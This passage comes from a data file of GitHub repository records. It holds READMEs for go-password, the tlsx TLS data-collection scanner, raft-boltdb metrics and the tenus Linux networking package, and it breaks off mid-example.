If your particular use case needs a mix of casing, then you can either increase the number of characters in the password or check the output and regenerate if it fails a particular constraint, such as requiring both upper and lower case.\n\n## Installation\n\n```sh\n$ go get -u github.com/sethvargo/go-password/password\n```\n\n## Usage\n\n```golang\npackage main\n\nimport (\n \"log\"\n\n \"github.com/sethvargo/go-password/password\"\n)\n\nfunc main() {\n // Generate a password that is 64 characters long with 10 digits, 10 symbols,\n // allowing upper and lower case letters, disallowing repeat characters.\n res, err := password.Generate(64, 10, 10, false, false)\n if err != nil {\n log.Fatal(err)\n }\n log.Printf(res)\n}\n```\n\nSee the [GoDoc](https://godoc.org/github.com/sethvargo/go-password) for more\ninformation.\n\n## Testing\n\nFor testing purposes, instead of accepted a `*password.Generator` struct, accept\na `password.PasswordGenerator` interface:\n\n```go\n// func MyFunc(p *password.Generator)\nfunc MyFunc(p password.PasswordGenerator) {\n // ...\n}\n```\n\nThen, in tests, use a mocked password generator with stubbed data:\n\n```go\nfunc TestMyFunc(t *testing.T) {\n gen := password.NewMockGenerator(\"canned-response\", false)\n MyFunc(gen)\n}\n```\n\nIn this example, the mock generator will always return the value\n\"canned-response\", regardless of the provided parameters.\n\n## License\n\nThis code is licensed under the MIT license.\n", "readme_type": "markdown", "hn_comments": "You know, the first thing I thought when I saw this was that the author should use the EFF word list and not the original diceware list.Then I saw that the author was Seth Vargo, and that he had already done that.Nice.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "projectdiscovery/tlsx", "link": "https://github.com/projectdiscovery/tlsx", "tags": [], "stars": 537, "description": "Fast and configurable TLS grabber focused on TLS based data collection.", "lang": "Go", "repo_lang": "", "readme": "

\n\n
\n

\n\n\n

\n\n\n\n\n\n\n

\n\n

\nFeatures \u2022 Installation \u2022 Usage \u2022 Running tlsx \u2022 Join Discord\n

\n\n\nA fast and configurable TLS grabber focused on TLS based **data collection and analysis**.\n\n\n# Features\n\n![image](https://user-images.githubusercontent.com/8293321/174847743-0e229545-2431-4b4c-9029-878f218ad0bc.png)\n\n - Fast And fully configurable TLS Connection\n - Multiple **Modes for TLS Connection**\n - Multiple **TLS probes**\n - **Auto TLS Fallback** for older TLS version\n - **Pre Handshake** TLS connection (early termination)\n - Customizable **Cipher / SNI / TLS** selection\n - **JARM/JA3** TLS Fingerprint\n - **TLS Misconfigurations**\n - **ASN,CIDR,IP,HOST,** and **URL** input\n - STD **IN/OUT** and **TXT/JSON** output\n\n\n## Installation\n\ntlsx requires **Go 1.18** to install successfully. To install, just run the below command or download pre-compiled binary from [release page](https://github.com/projectdiscovery/tlsx/releases).\n\n```console\ngo install github.com/projectdiscovery/tlsx/cmd/tlsx@latest\n```\n\n## Usage\n\n```console\ntlsx -h\n```\n\nThis will display help for the tool. Here are all the switches it supports.\n\n```console\nTLSX is a tls data gathering and analysis toolkit.\n\nUsage:\n tlsx [flags]\n\nFlags:\nINPUT:\n -u, -host string[] target host to scan (-u INPUT1,INPUT2)\n -l, -list string target list to scan (-l INPUT_FILE)\n -p, -port string[] target port to connect (default 443)\n\nSCAN-MODE:\n -sm, -scan-mode string tls connection mode to use (ctls, ztls, openssl, auto) (default \"auto\")\n -ps, -pre-handshake enable pre-handshake tls connection (early termination) using ztls\n -sa, -scan-all-ips scan all ips for a host (default false)\n -iv, -ip-version string[] ip version to use (4, 6) (default 4)\n\nPROBES:\n -san display subject alternative names\n -cn display subject common names\n -so display subject organization name\n -tv, -tls-version display used tls version\n -cipher display used cipher\n -hash string display certificate fingerprint hashes (md5,sha1,sha256)\n -jarm display jarm fingerprint hash\n -ja3 display ja3 fingerprint hash (using ztls)\n -wc, -wildcard-cert display host with wildcard ssl certificate\n -tps, -probe-status display tls probe status\n -ve, -version-enum enumerate and display supported tls versions\n -ce, -cipher-enum enumerate and display supported cipher\n -ch, -client-hello include client hello in json output (ztls mode only)\n -sh, -server-hello include server hello in json output (ztls mode only)\n\nMISCONFIGURATIONS:\n -ex, -expired display host with host expired certificate\n -ss, -self-signed display host with self-signed certificate\n -mm, -mismatched display host with mismatched certificate\n -re, -revoked display host with revoked certificate\n\nCONFIGURATIONS:\n -config string path to the tlsx configuration file\n -r, -resolvers string[] list of resolvers to use\n -cc, -cacert string client certificate authority file\n -ci, -cipher-input string[] ciphers to use with tls connection\n -sni string[] tls sni hostname to use\n -rs, -random-sni use random sni when empty\n -min-version string minimum tls version to accept (ssl30,tls10,tls11,tls12,tls13)\n -max-version string maximum tls version to accept (ssl30,tls10,tls11,tls12,tls13)\n -ac, -all-ciphers send all ciphers as accepted inputs (default true)\n -cert, -certificate include certificates in json output (PEM format)\n -tc, -tls-chain include certificates chain in json output\n -vc, -verify-cert enable verification of server certificate\n -ob, -openssl-binary string OpenSSL Binary Path\n\nOPTIMIZATIONS:\n -c, -concurrency int number of concurrent 
threads to process (default 300)\n -timeout int tls connection timeout in seconds (default 5)\n -retry int number of retries to perform for failures (default 3)\n -delay string duration to wait between each connection per thread (eg: 200ms, 1s)\n\nOUTPUT:\n -o, -output string file to write output to\n -j, -json display json format output\n -ro, -resp-only display tls response only\n -silent display silent output\n -nc, -no-color disable colors in cli output\n -v, -verbose display verbose output\n -version display project version\n\nDEBUG:\n -health-check, -hc run diagnostic check up\n```\n\n## Using tlsx as library\n\nExamples of using tlsx as library are provided in the [examples](examples/) folder.\n\n## Running tlsx\n\n### Input for tlsx\n\n**tlsx** requires **ip** to make TLS connection and accept multiple format as listed below:\n\n```bash\nAS1449 # ASN input\n173.0.84.0/24 # CIDR input\n93.184.216.34 # IP input\nexample.com # DNS input\nexample.com:443 # DNS input with port\nhttps://example.com:443 # URL input port\n```\n\nInput host can be provided using `-host / -u` flag, and multiple values can be provided using comma-separated input, similarly **file** input is supported using `-list / -l` flag.\n\nExample of comma-separated host input: \n\n```console\n$ tlsx -u 93.184.216.34,example.com,example.com:443,https://example.com:443 -silent\n```\n\nExample of file based host input:\n\n```console\n$ tlsx -list host_list.txt\n```\n\n**Port Input:**\n\n**tlsx** connects on port **443** by default, which can be customized using `-port / -p` flag, single or multiple ports can be specified using comma sperated input or new line delimited file containing list of ports to connect. \n\n\nExample of comma-separated port input: \n\n```\n$ tlsx -u hackerone.com -p 443,8443\n```\n\nExample of file based port input: \n\n```\n$ tlsx -u hackerone.com -p port_list.txt\n```\n\n**Note:**\n\n> When input host contains port in it, for example, `8.8.8.8:443` or `hackerone.com:8443`, port specified with host will be used to make TLS connection instead of default or one provided using `-port / -p` flag.\n\n### TLS Probe (default run)\n\nThis will run the tool against the given CIDR range and returns hosts that accepts tls connection on port 443.\n\n```console\n$ echo 173.0.84.0/24 | tlsx \n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. 
You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\n173.0.84.69:443\n173.0.84.67:443\n173.0.84.68:443\n173.0.84.66:443\n173.0.84.76:443\n173.0.84.70:443\n173.0.84.72:443\n```\n\n### SAN/CN Probe\n\nThe TLS certificate contains DNS names under the **subject alternative name** and **common name** fields, which can be extracted using the `-san` and `-cn` flags.\n\n```console\n$ echo 173.0.84.0/24 | tlsx -san -cn -silent\n\n173.0.84.104:443 [uptycspay.paypal.com]\n173.0.84.104:443 [api-3t.paypal.com]\n173.0.84.104:443 [api-m.paypal.com]\n173.0.84.104:443 [payflowpro.paypal.com]\n173.0.84.104:443 [pointofsale-s.paypal.com]\n173.0.84.104:443 [svcs.paypal.com]\n173.0.84.104:443 [uptycsven.paypal.com]\n173.0.84.104:443 [api-aa.paypal.com]\n173.0.84.104:443 [pilot-payflowpro.paypal.com]\n173.0.84.104:443 [pointofsale.paypal.com]\n173.0.84.104:443 [uptycshon.paypal.com]\n173.0.84.104:443 [api.paypal.com]\n173.0.84.104:443 [adjvendor.paypal.com]\n173.0.84.104:443 [zootapi.paypal.com]\n173.0.84.104:443 [api-aa-3t.paypal.com]\n173.0.84.104:443 [uptycsize.paypal.com]\n```\n\nFor ease of automation, the `-resp-only` flag can optionally be used to list only dns names in the CLI output.\n\n```console\n$ echo 173.0.84.0/24 | tlsx -san -cn -silent -resp-only\n\napi-aa-3t.paypal.com\npilot-payflowpro.paypal.com\npointofsale-s.paypal.com\nuptycshon.paypal.com\na.paypal.com\nadjvendor.paypal.com\nzootapi.paypal.com\napi-aa.paypal.com\npayflowpro.paypal.com\npointofsale.paypal.com\nuptycspay.paypal.com\napi-3t.paypal.com\nuptycsize.paypal.com\napi.paypal.com\napi-m.paypal.com\nsvcs.paypal.com\nuptycsven.paypal.com\nuptycsven.paypal.com\na.paypal.com\napi.paypal.com\npointofsale-s.paypal.com\npilot-payflowpro.paypal.com\n```\n\n**Subdomains** obtained from TLS certificates can be piped to other PD tools for further inspection; here is an example piping tls subdomains to **[dnsx](https://github.com/projectdiscovery/dnsx)** to filter the passively collected subdomains and passing them to **[httpx](https://github.com/projectdiscovery/httpx)** to list hosts running active web services.\n\n```console\n$ echo 173.0.84.0/24 | tlsx -san -cn -silent -resp-only | dnsx -silent | httpx\n\n __ __ __ _ __\n / /_ / /_/ /_____ | |/ /\n / __ \\/ __/ __/ __ \\| /\n / / / / /_/ /_/ /_/ / |\n/_/ /_/\\__/\\__/ .___/_/|_|\n /_/ v1.2.2\n\n projectdiscovery.io\n\nUse with caution. 
You are responsible for your actions.\nDevelopers assume no liability and are not responsible for any misuse or damage.\nhttps://api-m.paypal.com\nhttps://uptycsize.paypal.com\nhttps://api.paypal.com\nhttps://uptycspay.paypal.com\nhttps://svcs.paypal.com\nhttps://adjvendor.paypal.com\nhttps://uptycshap.paypal.com\nhttps://uptycshon.paypal.com\nhttps://pilot-payflowpro.paypal.com\nhttps://slc-a-origin-pointofsale.paypal.com\nhttps://uptycsven.paypal.com\nhttps://api-aa.paypal.com\nhttps://api-aa-3t.paypal.com\nhttps://uptycsbrt.paypal.com\nhttps://payflowpro.paypal.com\nhttp://pointofsale-s.paypal.com\nhttp://slc-b-origin-pointofsale.paypal.com\nhttp://api-3t.paypal.com\nhttp://zootapi.paypal.com\nhttp://pointofsale.paypal.com\n```\n\n### TLS / Cipher Probe\n\n```console\n$ subfinder -d hackerone.com | tlsx -tls-version -cipher\n\nmta-sts.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nhackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\napi.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nmta-sts.managed.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nmta-sts.forwarding.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nwww.hackerone.com:443 [TLS1.3] [TLS_AES_128_GCM_SHA256]\nsupport.hackerone.com:443 [TLS1.2] [TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256]\n```\n\n# TLS Misconfiguration\n\n### Expired / Self Signed / Mismatched / Revoked Certificate\n\nA list of hosts can be provided to tlsx to detect **expired / self-signed / mismatched / revoked** certificates.\n\n```console\n$ tlsx -l hosts.txt -expired -self-signed -mismatched -revoked\n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\nwrong.host.badssl.com:443 [mismatched]\nself-signed.badssl.com:443 [self-signed]\nexpired.badssl.com:443 [expired]\nrevoked.badssl.com:443 [revoked]\n```\n\n### [JARM](https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a/) TLS Fingerprint\n\n```console\n$ echo hackerone.com | tlsx -jarm -silent\n\nhackerone.com:443 [29d3dd00029d29d00042d43d00041d5de67cc9954cc85372523050f20b5007]\n```\n\n### [JA3](https://github.com/salesforce/ja3) TLS Fingerprint\n\n```console\n$ echo hackerone.com | tlsx -ja3 -silent\n\nhackerone.com:443 [20c9baf81bfe96ff89722899e75d0190]\n```\n\n### JSON Output\n\n**tlsx** supports multiple probe flags to query specific data, but all the information is always available in JSON format; for automation and post-processing, the `-json` output is the most convenient option to use.\n\n```console\necho example.com | tlsx -json -silent | jq .\n```\n\n```json\n{\n \"timestamp\": \"2022-08-22T21:22:59.799053+05:30\",\n \"host\": \"example.com\",\n \"ip\": \"93.184.216.34\",\n \"port\": \"443\",\n \"probe_status\": true,\n \"tls_version\": \"tls13\",\n \"cipher\": \"TLS_AES_256_GCM_SHA384\",\n \"not_before\": \"2022-03-14T00:00:00Z\",\n \"not_after\": \"2023-03-14T23:59:59Z\",\n \"subject_dn\": \"CN=www.example.org, O=Internet\u00a0Corporation\u00a0for\u00a0Assigned\u00a0Names\u00a0and\u00a0Numbers, L=Los Angeles, ST=California, C=US\",\n \"subject_cn\": \"www.example.org\",\n \"subject_org\": [\n \"Internet\u00a0Corporation\u00a0for\u00a0Assigned\u00a0Names\u00a0and\u00a0Numbers\"\n ],\n \"subject_an\": [\n \"www.example.org\",\n \"example.net\",\n \"example.edu\",\n \"example.com\",\n \"example.org\",\n 
\"www.example.com\",\n \"www.example.edu\",\n \"www.example.net\"\n ],\n \"issuer_dn\": \"CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US\",\n \"issuer_cn\": \"DigiCert TLS RSA SHA256 2020 CA1\",\n \"issuer_org\": [\n \"DigiCert Inc\"\n ],\n \"fingerprint_hash\": {\n \"md5\": \"c5208a47259d540a6e3404dddb85af91\",\n \"sha1\": \"df81dfa6b61eafdffffe1a250240db5d2e6cee25\",\n \"sha256\": \"7f2fe8d6b18e9a47839256cd97938daa70e8515750298ddba2f3f4b8440113fc\"\n },\n \"tls_connection\": \"ctls\",\n \"sni\": \"example.com\"\n}\n```\n\n## Configuration\n\n### Scan Mode\n\ntlsx provides multiple modes to make a TLS connection -\n\n- `auto` (automatic fallback to other modes upon failure) - **default**\n- `ctls` (**[crypto/tls](https://github.com/golang/go/blob/master/src/crypto/tls/tls.go)**)\n- `ztls` (**[zcrypto/tls](https://github.com/zmap/zcrypto)**)\n- `openssl` (**[openssl](https://github.com/openssl/openssl)**)\n\nSome pointers for each specific mode / library are highlighted in the [linked discussions](https://github.com/projectdiscovery/tlsx/discussions/2); `auto` mode ensures maximum coverage and scans hosts running older versions of TLS by retrying the connection using the `ztls` and `openssl` modes upon any connection error.\n\nAn example of using `ztls` mode to scan a website using an old / outdated TLS version:\n\n```console\n$ echo tls-v1-0.badssl.com | tlsx -port 1010 -sm ztls\n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\ntls-v1-0.badssl.com:1010\n```\n\n### OpenSSL\n\nTo use the openssl connection mode, you will need to have openssl installed on your system. Most modern systems come with openssl pre-installed, but if it is not present on your system, you can install it manually. You can check if openssl is installed by running the command `openssl version`. If openssl is installed, this command will display the version number.\n\n\n\n
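For instance, assuming openssl is already available on the PATH, a quick sanity check followed by a scan forced into `openssl` mode might look like the sketch below (the `-sm` and `-ob, -openssl-binary` flags are taken from the help output above; the binary path and the output shown are illustrative):\n\n```console\n$ openssl version\nOpenSSL 3.0.2 15 Mar 2022\n\n$ echo example.com | tlsx -sm openssl -ob /usr/bin/openssl -silent\nexample.com:443\n```\n\n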
\n\n### Pre-Handshake (Early Termination)\n\n**tlsx** supports terminating the SSL connection early, which leads to faster scanning and fewer connection requests (disconnecting after the TLS `serverhello` and certificate data are gathered).\n\nFor more detail, please refer to [Hunting-Certificates-And-Servers](https://github.com/erbbysam/Hunting-Certificates-And-Servers/blob/master/Hunting%20Certificates%20%26%20Servers.pdf) by [@erbbysam](https://twitter.com/erbbysam).\n\nAn example of using `-pre-handshake` mode:\n\n```console\n$ tlsx -u example.com -pre-handshake \n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\n\nexample.com:443\n```\n\n> **Note**:\n\n> **pre-handshake** mode utilizes `ztls` (**zcrypto/tls**), which also means support is limited to `TLS v1.2`, as `TLS v1.3` is not supported by the `ztls` library.\n\n
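Since the point of early termination is faster scanning at scale, the `-ps` flag can also be combined with the certificate probes shown earlier. The following is only a sketch built from the flags documented in the help output above; which probes can be answered from pre-handshake data depends on what is gathered before disconnecting, and the target range is illustrative:\n\n```console\n$ echo 173.0.84.0/24 | tlsx -ps -san -cn -silent -resp-only\n```\n\n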
\n\n\n\n### TLS Version\n\n**Minimum** and **Maximum** TLS versions can be specified using the `-min-version` and `-max-version` flags; by default these values are set by the underlying library.\n\nThe acceptable TLS version values are listed below.\n\n- `ssl30`\n- `tls10`\n- `tls11`\n- `tls12`\n- `tls13`\n\nHere is an example using `max-version` to scan for hosts supporting an older version of TLS, i.e. **TLS v1.0**:\n\n```console\n$ tlsx -u example.com -max-version tls10\n \n\n _____ _ _____ __\n |_ _| | / __\\ \\/ /\n | | | |__\\__ \\> < \n |_| |____|___/_/\\_\\ v0.0.1\n\n projectdiscovery.io\n\n[WRN] Use with caution. You are responsible for your actions.\n[WRN] Developers assume no liability and are not responsible for any misuse or damage.\nexample.com:443\n```\n\n### Custom Cipher\n\nCustom ciphers can be provided using the `-cipher-input / -ci` flag; the supported cipher list for each mode is available on the [wiki page](https://github.com/projectdiscovery/tlsx/wiki/Ciphers).\n\n```console\n$ tlsx -u example.com -ci TLS_AES_256_GCM_SHA384 -cipher\n```\n\n```console\n$ tlsx -u example.com -ci cipher_list.txt -cipher\n```\n\n## Acknowledgements\n\nThis program optionally uses:\n\n- [zcrypto](https://github.com/zmap/zcrypto) library from the zmap team.\n- [cfssl](https://github.com/cloudflare/cfssl) library from the cloudflare team.\n\n--------\n\n
\n\ntlsx is made with \u2764\ufe0f by the [projectdiscovery](https://projectdiscovery.io) team and distributed under [MIT License](LICENSE).\n\n
\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "hashicorp/raft-boltdb", "link": "https://github.com/hashicorp/raft-boltdb", "tags": [], "stars": 537, "description": "Raft backend implementation using BoltDB", "lang": "Go", "repo_lang": "", "readme": "raft-boltdb\n===========\n\nThis repository provides the `raftboltdb` package. The package exports the\n`BoltStore` which is an implementation of both a `LogStore` and `StableStore`.\n\nIt is meant to be used as a backend for the `raft` [package\nhere](https://github.com/hashicorp/raft).\n\nThis implementation uses [BoltDB](https://github.com/boltdb/bolt). BoltDB is\na simple key/value store implemented in pure Go, and inspired by LMDB.\n\n## Metrics\n\nThe raft-boldb library emits a number of metrics utilizing github.com/armon/go-metrics. Those metrics are detailed in the following table. One note is that the application which pulls in this library may add its own prefix to the metric names. For example within [Consul](https://github.com/hashicorp/consul), the metrics will be prefixed with `consul.`.\n\n| Metric | Unit | Type | Description |\n| ----------------------------------- | ------------:| -------:|:--------------------- |\n| `raft.boltdb.freelistBytes` | bytes | gauge | Represents the number of bytes necessary to encode the freelist metadata. When [`raft_boltdb.NoFreelistSync`](/docs/agent/options#NoFreelistSync) is set to `false` these metadata bytes must also be written to disk for each committed log. |\n| `raft.boltdb.freePageBytes` | bytes | gauge | Represents the number of bytes of free space within the raft.db file. |\n| `raft.boltdb.getLog` | ms | timer | Measures the amount of time spent reading logs from the db. |\n| `raft.boltdb.logBatchSize` | bytes | sample | Measures the total size in bytes of logs being written to the db in a single batch. |\n| `raft.boltdb.logsPerBatch` | logs | sample | Measures the number of logs being written per batch to the db. |\n| `raft.boltdb.logSize` | bytes | sample | Measures the size of logs being written to the db. |\n| `raft.boltdb.numFreePages` | pages | gauge | Represents the number of free pages within the raft.db file. |\n| `raft.boltdb.numPendingPages` | pages | gauge | Represents the number of pending pages within the raft.db that will soon become free. |\n| `raft.boltdb.openReadTxn` | transactions | gauge | Represents the number of open read transactions against the db |\n| `raft.boltdb.storeLogs` | ms | timer | Measures the amount of time spent writing logs to the db. |\n| `raft.boltdb.totalReadTxn` | transactions | gauge | Represents the total number of started read transactions against the db |\n| `raft.boltdb.txstats.cursorCount` | cursors | counter | Counts the number of cursors created since Consul was started. |\n| `raft.boltdb.txstats.nodeCount` | allocations | counter | Counts the number of node allocations within the db since Consul was started. |\n| `raft.boltdb.txstats.nodeDeref` | dereferences | counter | Counts the number of node dereferences in the db since Consul was started. |\n| `raft.boltdb.txstats.pageAlloc` | bytes | gauge | Represents the number of bytes allocated within the db since Consul was started. Note that this does not take into account space having been freed and reused. In that case, the value of this metric will still increase. |\n| `raft.boltdb.txstats.pageCount` | pages | gauge | Represents the number of pages allocated since Consul was started. 
Note that this does not take into account space having been freed and reused. In that case, the value of this metric will still increase. |\n| `raft.boltdb.txstats.rebalance` | rebalances | counter | Counts the number of node rebalances performed in the db since Consul was started. |\n| `raft.boltdb.txstats.rebalanceTime` | ms | timer | Measures the time spent rebalancing nodes in the db. |\n| `raft.boltdb.txstats.spill` | spills | counter | Counts the number of nodes spilled in the db since Consul was started. |\n| `raft.boltdb.txstats.spillTime` | ms | timer | Measures the time spent spilling nodes in the db. |\n| `raft.boltdb.txstats.split` | splits | counter | Counts the number of nodes split in the db since Consul was started. |\n| `raft.boltdb.txstats.write` | writes | counter | Counts the number of writes to the db since Consul was started. |\n| `raft.boltdb.txstats.writeTime` | ms | timer | Measures the amount of time spent performing writes to the db. |\n| `raft.boltdb.writeCapacity` | logs/second | sample | Theoretical write capacity in terms of the number of logs that can be written per second. Each sample outputs what the capacity would be if future batched log write operations were similar to this one. This similarity encompasses 4 things: batch size, byte size, disk performance and boltdb performance. While none of these will be static and its highly likely individual samples of this metric will vary, aggregating this metric over a larger time window should provide a decent picture into how this BoltDB store can perform |\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "milosgajdos/tenus", "link": "https://github.com/milosgajdos/tenus", "tags": ["docker", "networking", "linux", "netlink"], "stars": 537, "description": "Linux networking in Go", "lang": "Go", "repo_lang": "", "readme": "# Linux networking in Golang\n\n[![GoDoc](https://godoc.org/github.com/milosgajdos/tenus?status.svg)](https://godoc.org/github.com/milosgajdos/tenus)\n[![License](https://img.shields.io/:license-apache-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n**tenus** is a [Golang](http://golang.org/) package which allows you to configure and manage Linux network devices programmatically. It communicates with Linux Kernel via [netlink](http://man7.org/linux/man-pages/man7/netlink.7.html) to facilitate creation and configuration of network devices on the Linux host. The package also allows for more advanced network setups with Linux containers including [Docker](https://github.com/dotcloud/docker/).\n\n**tenus** uses [runc](https://github.com/opencontainers/runc)'s implementation of **netlink** protocol. The package only works with newer Linux Kernels (3.10+) which are shipping reasonably new `netlink` protocol implementation, so **if you are running older kernel this package won't be of much use to you** I'm afraid. I have developed this package on Ubuntu [Trusty Tahr](http://releases.ubuntu.com/14.04/) which ships with 3.13+ and verified its functionality on [Precise Pangolin](http://releases.ubuntu.com/12.04/) with upgraded kernel to version 3.10. I could worked around the `netlink` issues by using `ioctl` syscalls, but I decided to prefer \"pure netlink\" implementation, so suck it old Kernels.\n\nAt the moment only functional tests are available, but the interface design should hopefully allow for easy (ish) unit testing in the future. 
I do appreciate that the package's **test coverage is not great at the moment**, but the core functionality should be covered. I would massively welcome PRs.\n\n## Get started\n\nThere is a ```Vagrantfile``` available in the repo so using [vagrant](https://github.com/mitchellh/vagrant) is the easiest way to get started:\n\n```bash\nmilosgajdos@bimbonet ~ $ git clone https://github.com/milosgajdos/tenus.git\nmilosgajdos@bimbonet ~ $ vagrant up\n\n```\n\n**Note** using the provided ```Vagrantfile``` will take quite a long time to spin the VM as vagrant will setup Ubuntu Trusty VM with all the prerequisities:\n\n* it will install golang and docker onto the VM\n* it will export ```GOPATH``` and ```go get``` the **tenus** package onto the VM\n* it will also \"**pull**\" Docker ubuntu image so that you can run the tests once the VM is set up\n\nAt the moment running the tests require Docker to be installed, but in the future I'd love to separate tests per interface so that you can run only chosen test sets.\n\nOnce the VM is running, ```cd``` into particular repo directory and you can run the tests:\n\n```bash\nmilosgajdos@bimbonet ~ $ cd $GOPATH/src/github.com/milosgajdos/tenus\nmilosgajdos@bimbonet ~ $ sudo go test\n```\n\nIf you don't want to use the provided ```Vagrantfile```, you can simply run your own Linux VM (with 3.10+ kernel) and follow the regular golang development flow:\n\n```bash\nmilosgajdos@bimbonet ~ $ go get github.com/milosgajdos/tenus\nmilosgajdos@bimbonet ~ $ cd $GOPATH/src/github.com/milosgajdos/tenus\nmilosgajdos@bimbonet ~ $ sudo go test\n```\n\nOnce you've got the package and ran the tests (you don't need to run the tests!), you can start hacking. Below you can find simple code samples to get started with the package.\n\n## Examples\n\nBelow you can find a few code snippets which can help you get started writing your own programs.\n\n### New network bridge, add dummy link into it\n\nThe example below shows a simple program example which creates a new network bridge, a new dummy network link and adds it into the bridge.\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\n\t\"github.com/milosgajdos/tenus\"\n)\n\nfunc main() {\n\t// Create a new network bridge\n\tbr, err := tenus.NewBridgeWithName(\"mybridge\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Bring the bridge up\n\tif err = br.SetLinkUp(); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\t// Create a dummy link\n\tdl, err := tenus.NewLink(\"mydummylink\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Add the dummy link into bridge\n\tif err = br.AddSlaveIfc(dl.NetInterface()); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Bring the dummy link up\n\tif err = dl.SetLinkUp(); err != nil {\n\t\tfmt.Println(err)\n\t}\n}\n```\n\n### New network bridge, veth pair, one peer in Docker\n\nThe example below shows how you can create a new network bride, configure its IP address, add a new veth pair and send one of the veth peers into Docker with a given name.\n\n**!! 
You must make sure that particular Docker is runnig if you want the code sample below to work properly !!** So before you compile and run the program below you should create a particular docker with the below used name:\n\n```bash\nmilosgajdos@bimbonet ~ $ docker run -i -t --rm --privileged -h vethdckr --name vethdckr ubuntu:14.04 /bin/bash\n```\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\n\t\"github.com/milosgajdos/tenus\"\n)\n\nfunc main() {\n\t// CREATE BRIDGE AND BRING IT UP\n\tbr, err := tenus.NewBridgeWithName(\"vethbridge\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tbrIp, brIpNet, err := net.ParseCIDR(\"10.0.41.1/16\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tif err := br.SetLinkIp(brIp, brIpNet); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tif err = br.SetLinkUp(); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\t// CREATE VETH PAIR\n\tveth, err := tenus.NewVethPairWithOptions(\"myveth01\", tenus.VethOptions{PeerName: \"myveth02\"})\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// ASSIGN IP ADDRESS TO THE HOST VETH INTERFACE\n\tvethHostIp, vethHostIpNet, err := net.ParseCIDR(\"10.0.41.2/16\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tif err := veth.SetLinkIp(vethHostIp, vethHostIpNet); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\t// ADD MYVETH01 INTERFACE TO THE MYBRIDGE BRIDGE\n\tmyveth01, err := net.InterfaceByName(\"myveth01\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tif err = br.AddSlaveIfc(myveth01); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tif err = veth.SetLinkUp(); err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\t// PASS VETH PEER INTERFACE TO A RUNNING DOCKER BY PID\n\tpid, err := tenus.DockerPidByName(\"vethdckr\", \"/var/run/docker.sock\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\n\tif err := veth.SetPeerLinkNsPid(pid); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// ALLOCATE AND SET IP FOR THE NEW DOCKER INTERFACE\n\tvethGuestIp, vethGuestIpNet, err := net.ParseCIDR(\"10.0.41.5/16\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tif err := veth.SetPeerLinkNetInNs(pid, vethGuestIp, vethGuestIpNet, nil); err != nil {\n\t\tlog.Fatal(err)\n\t}\n}\n```\n\n### Working with existing bridges and interfaces\n\nThe following examples show how to retrieve exisiting interfaces as a tenus link and bridge\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"net\"\n\n\t\"github.com/milosgajdos/tenus\"\n)\n\nfunc main() {\n\t// RETRIEVE EXISTING BRIDGE\n\tbr, err := tenus.BridgeFromName(\"bridge0\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// REMOVING AN IP FROM A BRIDGE INTERFACE (BEFORE RECONFIGURATION)\n\tbrIp, brIpNet, err := net.ParseCIDR(\"10.0.41.1/16\")\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tif err := br.UnsetLinkIp(brIp, brIpNet); err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// RETRIEVE EXISTING INTERFACE\n\tdl, err := 